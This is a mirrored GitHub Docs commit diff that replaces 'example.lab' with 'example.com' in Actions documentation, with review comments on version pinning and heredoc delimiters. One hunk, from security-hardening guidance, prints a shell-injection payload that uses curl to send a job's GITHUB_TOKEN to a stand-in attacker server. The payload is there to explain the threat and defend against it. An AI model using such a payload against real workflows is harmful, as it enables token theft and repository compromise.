mirror of synced 2025-12-22 11:26:57 -05:00

Switch example.lab to example.com (#32500)

Co-authored-by: Laura Coursen <lecoursen@github.com>
Martin Lopes
2022-11-11 04:55:20 +10:00
committed by GitHub
parent d82f268a6f
commit c0ea72f4dc
3 changed files with 5 additions and 5 deletions


@@ -120,8 +120,8 @@ You can use `go get` to install dependencies:
- name: Install dependencies
run: |
go get .
go get example.lab/octo-examplemodule
go get example.lab/octo-examplemodule@v1.3.4
go get example.com/octo-examplemodule
go get example.com/octo-examplemodule@v1.3.4
```
{% ifversion actions-caching %}
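Review bot: the unversioned `go get example.com/octo-examplemodule` line sits next to the pinned `@v1.3.4` form with nothing telling the reader which to prefer. In a CI job the unversioned form resolves to whatever version is current when the job runs, so the build can change without any commit in the repository. Consider a one-line comment in the snippet recommending the pinned form (or relying on the versions recorded in `go.mod` and `go.sum`) so dependency changes stay reproducible and reviewable.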


@@ -245,7 +245,7 @@ An attacker can exfiltrate any stolen secrets or other data from the runner. To
### Stealing the job's `GITHUB_TOKEN`
It is possible for an attacker to steal a job's `GITHUB_TOKEN`. The {% data variables.product.prodname_actions %} runner automatically receives a generated `GITHUB_TOKEN` with permissions that are limited to just the repository that contains the workflow, and the token expires after the job has completed. Once expired, the token is no longer useful to an attacker. To work around this limitation, they can automate the attack and perform it in fractions of a second by calling an attacker-controlled server with the token, for example: `a"; set +e; curl http://example.lab?token=$GITHUB_TOKEN;#`.
It is possible for an attacker to steal a job's `GITHUB_TOKEN`. The {% data variables.product.prodname_actions %} runner automatically receives a generated `GITHUB_TOKEN` with permissions that are limited to just the repository that contains the workflow, and the token expires after the job has completed. Once expired, the token is no longer useful to an attacker. To work around this limitation, they can automate the attack and perform it in fractions of a second by calling an attacker-controlled server with the token, for example: `a"; set +e; curl http://example.com?token=$GITHUB_TOKEN;#`.
### Modifying the contents of a repository
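Review bot: the paragraph on the changed line ends on the `curl http://example.com?token=$GITHUB_TOKEN` one-liner and the visible context moves straight to the next heading, so the reader is left with the attack and no mitigation. While this sentence is being touched, consider following it with a pointer to limiting the token through the workflow `permissions` key, since the text already stresses that the token's value to an attacker is bounded by its permissions and lifetime.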


@@ -709,7 +709,7 @@ steps:
id: step_one
run: |
echo 'JSON_RESPONSE<<EOF' >> $GITHUB_ENV
curl https://example.lab >> $GITHUB_ENV
curl https://example.com >> $GITHUB_ENV
echo 'EOF' >> $GITHUB_ENV
```
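Review bot: the `curl https://example.com >> $GITHUB_ENV` line writes an unvalidated remote response between a fixed `EOF` delimiter. If the response ever contains a line reading `EOF`, the value ends there and everything after it is parsed as further environment entries for later steps. Suggest the example generate a random delimiter per run, quote `"$GITHUB_ENV"`, and pass `--fail` to curl so an HTTP error page is not appended to the environment file.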
@@ -723,7 +723,7 @@ steps:
id: step_one
run: |
"JSON_RESPONSE<<EOF" >> $env:GITHUB_ENV
(Invoke-WebRequest -Uri "https://example.lab").Content >> $env:GITHUB_ENV
(Invoke-WebRequest -Uri "https://example.com").Content >> $env:GITHUB_ENV
"EOF" >> $env:GITHUB_ENV
shell: pwsh
```
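Review bot: the pwsh variant wraps `(Invoke-WebRequest -Uri "https://example.com").Content` in a fixed `"EOF"` delimiter, so a response containing an `EOF` line closes the value early and the remainder is read as additional environment entries. A per-run delimiter, for example one built from `[guid]::NewGuid()`, would make the snippet safe to copy as written.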